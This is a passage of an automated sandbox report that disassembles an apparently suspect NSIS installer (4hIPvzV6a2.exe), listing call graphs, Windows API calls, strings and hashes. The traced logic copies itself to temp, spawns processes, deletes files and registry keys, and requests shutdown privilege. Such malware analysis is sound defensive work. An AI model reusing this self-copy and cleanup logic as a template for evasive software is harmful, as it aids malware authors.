405e17 3253->3255 3256 405e01 3253->3256 3254->3236 3258 4055dc 28 API calls 3255->3258 3259 4055dc 28 API calls 3256->3259 3256->3264 3258->3264 3261 405e0e 3259->3261 3260->3248 3263 406317 40 API calls 3261->3263 3262->3250 3263->3264 3264->3103 3265->3248 3266->3248 3268 403a2c CopyFileW 3267->3268 3269 40632b 3267->3269 3268->3097 3268->3103 3395 40619d 3269->3395 3273 405b79 3272->3273 3274 405b6d CloseHandle 3272->3274 3273->3103 3274->3273 3276 4068ca FindClose 3275->3276 3277 4068d5 3275->3277 3276->3277 3277->3103 3279 401389 2 API calls 3278->3279 3280 401420 3279->3280 3280->3062 3282 405e42 lstrcatW 3281->3282 3283 40351f 3281->3283 3282->3283 3283->3114 3284->3120 3285->3122 3287 405e80 3286->3287 3288 4030ee 3287->3288 3289 405e86 CharPrevW 3287->3289 3290 406557 lstrcpynW 3288->3290 3289->3287 3289->3288 3290->3126 3292 403027 3291->3292 3293 40303f 3291->3293 3294 403030 DestroyWindow 3292->3294 3295 403037 3292->3295 3296 403047 3293->3296 3297 40304f GetTickCount 3293->3297 3294->3295 3295->3129 3327 406987 3296->3327 3298 403080 3297->3298 3299 40305d CreateDialogParamW ShowWindow 3297->3299 3298->3129 3299->3298 3302->3137 3305 4032d2 3303->3305 3304 403300 3307 4034d4 ReadFile 3304->3307 3305->3304 3333 4034ea SetFilePointer 3305->3333 3308 40330b 3307->3308 3309 40346d 3308->3309 3310 40331d GetTickCount 3308->3310 3312 403457 3308->3312 3311 4034af 3309->3311 3316 403471 3309->3316 3310->3312 3319 40336c 3310->3319 3314 4034d4 ReadFile 3311->3314 3312->3144 3313 4034d4 ReadFile 3313->3319 3314->3312 3315 4034d4 ReadFile 3315->3316 3316->3312 3316->3315 3317 4060f9 WriteFile 3316->3317 3317->3316 3318 4033c2 GetTickCount 3318->3319 3319->3312 3319->3313 3319->3318 3320 4033e7 MulDiv wsprintfW 3319->3320 3331 4060f9 WriteFile 3319->3331 3334 4055dc 3320->3334 3345 4060ca ReadFile 3323->3345 3326->3136 3328 4069a4 PeekMessageW 3327->3328 3329 40304d 3328->3329 3330 40699a DispatchMessageW 3328->3330 3329->3129 3330->3328 3332 406117 3331->3332 3332->3319 3333->3304 3335 4055f7 3334->3335 3336 405699 3334->3336 3337 405613 lstrlenW 3335->3337 3338 406594 21 API calls 3335->3338 3336->3319 3339 405621 lstrlenW 3337->3339 3340 40563c 3337->3340 3338->3337 3339->3336 3343 405633 lstrcatW 3339->3343 3341 405642 SetWindowTextW 3340->3341 3342 40564f 3340->3342 3341->3342 3342->3336 3344 405655 SendMessageW SendMessageW SendMessageW 3342->3344 3343->3340 3344->3336 3346 4034e7 3345->3346 3346->3140 3347->3154 3349 403f13 3348->3349 3364 40649e wsprintfW 3349->3364 3351 403f84 3365 403fb8 3351->3365 3353 403f89 3354 403cb4 3353->3354 3355 406594 21 API calls 3353->3355 3354->3159 3355->3353 3356->3161 3368 404522 3357->3368 3359 4056f9 3360 404522 SendMessageW 3359->3360 3362 40570b OleUninitialize 3360->3362 3361 4056d2 3361->3359 3371 401389 3361->3371 3362->3191 3364->3351 3366 406594 21 API calls 3365->3366 3367 403fc6 SetWindowTextW 3366->3367 3367->3353 3369 40453a 3368->3369 3370 40452b SendMessageW 3368->3370 3369->3361 3370->3369 3373 401390 3371->3373 3372 4013fe 3372->3361 3373->3372 3374 4013cb MulDiv SendMessageW 3373->3374 3374->3373 3375->3206 3377 405eee 3376->3377 3380 405f00 3376->3380 3379 405efb CharNextW 3377->3379 3377->3380 3378 405f24 3378->3209 3378->3210 3379->3378 3380->3378 3381 405e53 CharNextW 3380->3381 3381->3380 3382->3238 3383->3248 3392 406022 GetFileAttributesW 3384->3392 3387 405c48 3387->3248 3388 405c36 RemoveDirectoryW 3390 405c44 3388->3390 3389 405c3e DeleteFileW 3389->3390 3390->3387 3391 405c54 SetFileAttributesW 3390->3391 3391->3387 3393 405c27 3392->3393 3394 406034 SetFileAttributesW 3392->3394 3393->3387 3393->3388 3393->3389 3394->3393 3396 4061f3 GetShortPathNameW 3395->3396 3397 4061cd 3395->3397 3399 406312 3396->3399 3400 406208 3396->3400 3422 406047 GetFileAttributesW CreateFileW 3397->3422 3399->3268 3400->3399 3402 406210 wsprintfA 3400->3402 3401 4061d7 CloseHandle GetShortPathNameW 3401->3399 3403 4061eb 3401->3403 3404 406594 21 API calls 3402->3404 3403->3396 3403->3399 3405 406238 3404->3405 3423 406047 GetFileAttributesW CreateFileW 3405->3423 3407 406245 3407->3399 3408 406254 GetFileSize GlobalAlloc 3407->3408 3409 406276 3408->3409 3410 40630b CloseHandle 3408->3410 3411 4060ca ReadFile 3409->3411 3410->3399 3412 40627e 3411->3412 3412->3410 3424 405fac lstrlenA 3412->3424 3415 406295 lstrcpyA 3418 4062b7 3415->3418 3416 4062a9 3417 405fac 4 API calls 3416->3417 3417->3418 3419 4062ee SetFilePointer 3418->3419 3420 4060f9 WriteFile 3419->3420 3421 406304 GlobalFree 3420->3421 3421->3410 3422->3401 3423->3407 3425 405fed lstrlenA 3424->3425 3426 405ff5 3425->3426 3427 405fc6 lstrcmpiA 3425->3427 3426->3415 3426->3416 3427->3426 3428 405fe4 CharNextA 3427->3428 3428->3425 4386 401a35 4387 402dab 21 API calls 4386->4387 4388 401a3e ExpandEnvironmentStringsW 4387->4388 4389 401a52 4388->4389 4391 401a65 4388->4391 4390 401a57 lstrcmpW 4389->4390 4389->4391 4390->4391 4397 4023b7 4398 4023c5 4397->4398 4399 4023bf 4397->4399 4401 4023d3 4398->4401 4402 402dab 21 API calls 4398->4402 4400 402dab 21 API calls 4399->4400 4400->4398 4403 4023e1 4401->4403 4404 402dab 21 API calls 4401->4404 4402->4401 4405 402dab 21 API calls 4403->4405 4404->4403 4406 4023ea WritePrivateProfileStringW 4405->4406 4407 4014b8 4408 4014be 4407->4408 4409 401389 2 API calls 4408->4409 4410 4014c6 4409->4410 4411 402439 4412 402441 4411->4412 4413 40246c 4411->4413 4415 402deb 21 API calls 4412->4415 4414 402dab 21 API calls 4413->4414 4416 402473 4414->4416 4417 402448 4415->4417 4422 402e69 4416->4422 4419 402dab 21 API calls 4417->4419 4421 402480 4417->4421 4420 402459 RegDeleteValueW RegCloseKey 4419->4420 4420->4421 4423 402e76 4422->4423 4424 402e7d 4422->4424 4423->4421 4424->4423 4426 402eae 4424->4426 4427 4063c4 RegOpenKeyExW 4426->4427 4428 402edc 4427->4428 4429 402f86 4428->4429 4430 402eec RegEnumValueW 4428->4430 4434 402f0f 4428->4434 4429->4423 4431 402f76 RegCloseKey 4430->4431 4430->4434 4431->4429 4432 402f4b RegEnumKeyW 4433 402f54 RegCloseKey 4432->4433 4432->4434 4435 40694b 5 API calls 4433->4435 4434->4431 4434->4432 4434->4433 4436 402eae 6 API calls 4434->4436 4437 402f64 4435->4437 4436->4434 4437->4429 4438 402f68 RegDeleteKeyW 4437->4438 4438->4429 4439 40173a 4440 402dab 21 API calls 4439->4440 4441 401741 SearchPathW 4440->4441 4442 40175c 4441->4442 4443 401d3d 4444 402d89 21 API calls 4443->4444 4445 401d44 4444->4445 4446 402d89 21 API calls 4445->4446 4447 401d50 GetDlgItem 4446->4447 4448 40263d 4447->4448

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 403532-403584 SetErrorMode GetVersionExW 1 403586-4035b6 GetVersionExW 0->1 2 4035be-4035c3 0->2 1->2 3 4035c5 2->3 4 4035cb-40360d 2->4 3->4 5 403620 4->5 6 40360f-403617 call 40694b 4->6 8 403625-403639 call 4068db lstrlenA 5->8 6->5 12 403619 6->12 13 40363b-403657 call 40694b * 3 8->13 12->5 20 403668-4036cc #17 OleInitialize SHGetFileInfoW call 406557 GetCommandLineW call 406557 13->20 21 403659-40365f 13->21 28 4036d5-4036e9 call 405e53 CharNextW 20->28 29 4036ce-4036d0 20->29 21->20 25 403661 21->25 25->20 32 4037e4-4037ea 28->32 29->28 33 4037f0 32->33 34 4036ee-4036f4 32->34 37 403804-40381e GetTempPathW call 403501 33->37 35 4036f6-4036fb 34->35 36 4036fd-403704 34->36 35->35 35->36 38 403706-40370b 36->38 39 40370c-403710 36->39 44 403820-40383e GetWindowsDirectoryW lstrcatW call 403501 37->44 45 403876-403890 DeleteFileW call 403082 37->45 38->39 42 4037d1-4037e0 call 405e53 39->42 43 403716-40371c 39->43 42->32 61 4037e2-4037e3 42->61 47 403736-40376f 43->47 48 40371e-403725 43->48 44->45 64 403840-403870 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403501 44->64 66 403896-40389c 45->66 67 403a7d-403a8d ExitProcess CoUninitialize 45->67 54 403771-403776 47->54 55 40378c-4037c6 47->55 52 403727-40372a 48->52 53 40372c 48->53 52->47 52->53 53->47 54->55 56 403778-403780 54->56 58 4037c8-4037cc 55->58 59 4037ce-4037d0 55->59 62 403782-403785 56->62 63 403787 56->63 58->59 65 4037f2-4037ff call 406557 58->65 59->42 61->32 62->55 62->63 63->55 64->45 64->67 65->37 71 4038a2-4038ad call 405e53 66->71 72 403935-40393c call 403c29 66->72 69 403ab3-403ab9 67->69 70 403a8f-403a9f call 405bb7 ExitProcess 67->70 77 403b37-403b3f 69->77 78 403abb-403ad1 GetCurrentProcess OpenProcessToken 69->78 88 4038fb-403905 71->88 89 4038af-4038e4 71->89 86 403941-403945 72->86 80 403b41 77->80 81 403b45-403b49 ExitProcess 77->81 84 403ad3-403b01 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403b07-403b15 call 40694b 78->85 80->81 84->85 97 403b23-403b2e ExitWindowsEx 85->97 98 403b17-403b21 85->98 86->67 91 403907-403915 call 405f2e 88->91 92 40394a-403970 call 405b22 lstrlenW call 406557 88->92 93 4038e6-4038ea 89->93 91->67 107 40391b-403931 call 406557 * 2 91->107 110 403981-403999 92->110 111 403972-40397c call 406557 92->111 95 4038f3-4038f7 93->95 96 4038ec-4038f1 93->96 95->93 101 4038f9 95->101 96->95 96->101 97->77 102 403b30-403b32 call 40140b 97->102 98->97 98->102 101->88 102->77 107->72 114 40399e-4039a2 110->114 111->110 116 4039a7-4039d1 wsprintfW call 406594 114->116 120 4039d3-4039d8 call 405aab 116->120 121 4039da call 405b05 116->121 124 4039df-4039e1 120->124 121->124 126 4039e3-4039ed GetFileAttributesW 124->126 127 403a1d-403a3c SetCurrentDirectoryW call 406317 CopyFileW 124->127 128 403a0e-403a19 126->128 129 4039ef-4039f8 DeleteFileW 126->129 135 403a7b 127->135 136 403a3e-403a5f call 406317 call 406594 call 405b3a 127->136 128->114 132 403a1b 128->132 129->128 131 4039fa-403a0c call 405c63 129->131 131->116 131->128 132->67 135->67 144 403a61-403a6b 136->144 145 403aa5-403ab1 CloseHandle 136->145 144->135 146 403a6d-403a75 call 4068b4 144->146 145->135 146->116 146->135
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403555
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
                                        • OleInitialize.OLE32(00000000), ref: 00403670
                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
                                        • CharNextW.USER32(00000000,0043F000,00000020,0043F000,00000000,?,00000008,0000000A,0000000C), ref: 004036DD
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0043F000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                        • wsprintfW.USER32 ref: 004039B1
                                        • GetFileAttributesW.KERNEL32(00437800,C:\Users\user\AppData\Local\Temp\), ref: 004039E4
                                        • DeleteFileW.KERNEL32(00437800), ref: 004039F0
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E
                                          • Part of subcall function 00406317: MoveFileExW.KERNELBASE(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\4hIPvzV6a2.exe,00437800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34
                                          • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
                                          • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70
                                          • Part of subcall function 004068B4: FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                          • Part of subcall function 004068B4: FindClose.KERNEL32(00000000), ref: 004068CB
                                        • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A7D
                                        • CoUninitialize.COMBASE(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A82
                                        • ExitProcess.KERNEL32 ref: 00403A9F
                                        • CloseHandle.KERNEL32(00000000,00438000,00438000,?,00437800,00000000), ref: 00403AA6
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AC2
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC9
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADE
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403B01
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B26
                                        • ExitProcess.KERNEL32 ref: 00403B49
                                          • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: File$Process$Exit$CloseDirectory$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv4B6.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\4hIPvzV6a2.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                        • API String ID: 2017177436-4052740033
                                        • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                        • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 289 405c63-405c89 call 405f2e 292 405ca2-405ca9 289->292 293 405c8b-405c9d DeleteFileW 289->293 295 405cab-405cad 292->295 296 405cbc-405ccc call 406557 292->296 294 405e1f-405e23 293->294 297 405cb3-405cb6 295->297 298 405dcd-405dd2 295->298 302 405cdb-405cdc call 405e72 296->302 303 405cce-405cd9 lstrcatW 296->303 297->296 297->298 298->294 301 405dd4-405dd7 298->301 304 405de1-405de9 call 4068b4 301->304 305 405dd9-405ddf 301->305 306 405ce1-405ce5 302->306 303->306 304->294 312 405deb-405dff call 405e26 call 405c1b 304->312 305->294 309 405cf1-405cf7 lstrcatW 306->309 310 405ce7-405cef 306->310 313 405cfc-405d18 lstrlenW FindFirstFileW 309->313 310->309 310->313 329 405e01-405e04 312->329 330 405e17-405e1a call 4055dc 312->330 315 405dc2-405dc6 313->315 316 405d1e-405d26 313->316 315->298 320 405dc8 315->320 317 405d46-405d5a call 406557 316->317 318 405d28-405d30 316->318 331 405d71-405d7c call 405c1b 317->331 332 405d5c-405d64 317->332 321 405d32-405d3a 318->321 322 405da5-405db5 FindNextFileW 318->322 320->298 321->317 325 405d3c-405d44 321->325 322->316 328 405dbb-405dbc FindClose 322->328 325->317 325->322 328->315 329->305 333 405e06-405e15 call 4055dc call 406317 329->333 330->294 342 405d9d-405da0 call 4055dc 331->342 343 405d7e-405d81 331->343 332->322 334 405d66-405d6f call 405c63 332->334 333->294 334->322 342->322 346 405d83-405d93 call 4055dc call 406317 343->346 347 405d95-405d9b 343->347 346->322 347->322
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CD4
                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CF7
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
                                        • FindFirstFileW.KERNELBASE(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
                                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                        • FindClose.KERNEL32(00000000), ref: 00405DBC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                        • API String ID: 2035342205-1023570929
                                        • Opcode ID: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                        • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                        • Opcode Fuzzy Hash: bc80552e2adf98b6cbbc0c73f9d9449be503fe2b945a8ee0ce3316eb6b08af02
                                        • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 580 4068b4-4068c8 FindFirstFileW 581 4068d5 580->581 582 4068ca-4068d3 FindClose 580->582 583 4068d7-4068d8 581->583 582->583
                                        APIs
                                        • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\,00405F77,C:\,C:\,00000000,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                        • FindClose.KERNEL32(00000000), ref: 004068CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\
                                        • API String ID: 2295610775-3404278061
                                        • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                        • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 149 403c29-403c41 call 40694b 152 403c43-403c4e GetUserDefaultUILanguage call 40649e 149->152 153 403c55-403c8c call 406425 149->153 157 403c53 152->157 158 403ca4-403caa lstrcatW 153->158 159 403c8e-403c9f call 406425 153->159 160 403caf-403cd8 call 403eff call 405f2e 157->160 158->160 159->158 166 403d6a-403d72 call 405f2e 160->166 167 403cde-403ce3 160->167 173 403d80-403da5 LoadImageW 166->173 174 403d74-403d7b call 406594 166->174 167->166 168 403ce9-403d11 call 406425 167->168 168->166 178 403d13-403d17 168->178 176 403e26-403e2e call 40140b 173->176 177 403da7-403dd7 RegisterClassW 173->177 174->173 191 403e30-403e33 176->191 192 403e38-403e43 call 403eff 176->192 179 403ef5 177->179 180 403ddd-403e21 SystemParametersInfoW CreateWindowExW 177->180 182 403d29-403d35 lstrlenW 178->182 183 403d19-403d26 call 405e53 178->183 185 403ef7-403efe 179->185 180->176 186 403d37-403d45 lstrcmpiW 182->186 187 403d5d-403d65 call 405e26 call 406557 182->187 183->182 186->187 190 403d47-403d51 GetFileAttributesW 186->190 187->166 194 403d53-403d55 190->194 195 403d57-403d58 call 405e72 190->195 191->185 201 403e49-403e63 ShowWindow call 4068db 192->201 202 403ecc-403ed4 call 4056af 192->202 194->187 194->195 195->187 209 403e65-403e6a call 4068db 201->209 210 403e6f-403e81 GetClassInfoW 201->210 207 403ed6-403edc 202->207 208 403eee-403ef0 call 40140b 202->208 207->191 213 403ee2-403ee9 call 40140b 207->213 208->179 209->210 211 403e83-403e93 GetClassInfoW RegisterClassW 210->211 212 403e99-403eca DialogBoxParamW call 40140b call 403b79 210->212 211->212 212->185 213->191
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403C43
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0043F000,00008001), ref: 00403CAA
                                        • lstrlenW.KERNEL32(Del,?,?,?,Del,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                        • lstrcmpiW.KERNEL32(?,.exe,Del,?,?,?,Del,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                        • GetFileAttributesW.KERNEL32(Del), ref: 00403D48
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
                                        • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                        • RegisterClassW.USER32(004336A0), ref: 00403E93
                                        • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1879269284.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1879243123.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879296706.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879325305.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1879443943.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_4hIPvzV6a2.jbxd
                                        Similarity
